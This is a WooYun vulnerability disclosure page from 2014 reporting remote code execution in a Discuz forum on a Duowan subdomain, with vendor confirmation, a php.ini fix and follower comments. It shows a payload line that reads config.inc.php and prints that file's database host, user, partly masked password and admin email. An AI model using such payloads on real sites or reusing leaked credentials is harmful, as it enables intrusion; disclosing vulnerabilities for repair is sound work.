当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080879

漏洞标题:多玩某分站存在远程代码执行漏洞

相关厂商:广州多玩

漏洞作者: 猪猪侠

提交时间:2014-10-26 17:57

修复时间:2014-12-10 17:58

公开时间:2014-12-10 17:58

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向核心白帽子及相关领域专家公开
2014-11-16: 细节向普通白帽子公开
2014-11-26: 细节向实习白帽子公开
2014-12-10: 细节向公众公开

简要描述:

多玩某分站远程代码执行漏洞

详细说明:

影响网站:
http://yaoguobbs.duowan.com


mask 区域
*****^^^*****
1.http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt


漏洞证明:

cmd.png


cmd=echo readfile('./config.inc.php');

<?php
/*
[Discuz!] (C)2001-2006 Comsenz Inc.
This is NOT a freeware, use is subject to license terms
$RCSfile: config5.inc.php,v $
$Revision: 1.1 $
$Date: 2007/11/10 04:06:46 $
*/
// [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商
$dbhost = '10.20.**.**:6301'; // 数据库服务器
$dbuser = 'net_wgbbs_rw'; // 数据库用户名
$dbpw = '0Sk*****9ir'; // 数据库密码
$dbname = 'wgbbs'; // 数据库名
$pconnect = 0; // 数据库持久连接 0=关闭, 1=打开
// [CH] 如您对 cookie 作用范围有特殊要求, 或论坛登录不正常, 请修改下面变量, 否则请保持默认
$cookiepre = 'wgbbs_'; // cookie 前缀
$cookiedomain = 'duowan.com'; // cookie 作用域
$cookiepath = '/'; // cookie 作用路径
// [CH] 论坛投入使用后不能修改的变量
$tablepre = 'club_'; // 表名前缀, 同一数据库安装多个论坛请修改此处
// [CH] 小心修改以下变量, 否则可能导致论坛无法正常使用
$database = 'mysql'; // 论坛数据库类型,请勿修改
$dbcharset = ''; // MySQL 字符集, 可选 'gbk', 'big5', 'utf8', 'latin1', 留空为按照论坛字符集设定
$charset = 'utf-8'; // 论坛页面默认字符集, 可选 'gbk', 'big5', 'utf-8'
$headercharset = 0; // 强制论坛页面使用默认字符集,可避免部分服务器空间页面出现乱码,一般无需开启。 0=关闭 1= 开启
$tplrefresh = 1; // 论坛风格模板自动刷新开关 0=关闭, 1=打开。
// [CH] 论坛安全设置, 调整以下设置,可以增强论坛的安全性能和防御性能
$adminemail = 'zhoushu@chinaduo.com'; // 系统管理员 Email

修复方案:

更改php.ini
设置: request_order为GPC

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-10-27 21:49

厂商回复:

感谢对于欢聚时代安全工作的支持,我们会尽快修复

最新状态:

暂无


漏洞评价:

评论

  1. 2014-10-26 18:00 | 健宇 ( 普通白帽子 | Rank:131 漏洞数:14 | tools kid)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  2. 2014-10-26 18:02 | 咖啡 ( 实习白帽子 | Rank:48 漏洞数:20 )

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  3. 2014-10-26 18:14 | 龍 、 ( 普通白帽子 | Rank:398 漏洞数:135 | 你若安好 我就是晴天)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  4. 2014-10-26 19:32 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子,温润如玉)

    敢不敢说是strust2

  5. 2014-10-26 20:51 | c0nt ( 路人 | Rank:1 漏洞数:7 )

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  6. 2014-10-27 08:43 | backtrack丶yao ( 普通白帽子 | Rank:290 漏洞数:107 | "><img src=x onerror=alert(666666);> <im...)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  7. 2014-10-27 09:17 | sky ( 实习白帽子 | Rank:94 漏洞数:33 | 有一天,我带着儿子@jeary 去@园长 的园长...)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  8. 2014-10-27 11:50 | Cyrils ( 实习白帽子 | Rank:45 漏洞数:10 | the more the better)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  9. 2014-10-27 15:56 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @第四维度 这是discuz命令执行,非st2

  10. 2014-10-27 17:42 | 哦哦 ( 路人 | Rank:2 漏洞数:1 | 好123,最好的导航,没有之一)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  11. 2014-10-27 18:59 | 0c0c0f ( 实习白帽子 | Rank:48 漏洞数:15 | My H34rt c4n 3xploit 4ny h0les!)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  12. 2014-10-28 09:34 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    discuz命令执行,牛b

  13. 2014-10-28 09:54 | Zion! ( 路人 | Rank:4 漏洞数:1 | 小菜鸟 学习....)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  14. 2014-10-28 21:15 | 山羊 ( 路人 | Rank:0 漏洞数:1 | 暂无)

    discuz命令执行???

  15. 2014-11-09 21:10 | izj ( 路人 | Rank:7 漏洞数:3 | 爱老婆)

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  16. 2014-11-26 20:09 | 山羊 ( 路人 | Rank:0 漏洞数:1 | 暂无)

    @猪猪侠 能加个Q吗?99043846 有事谈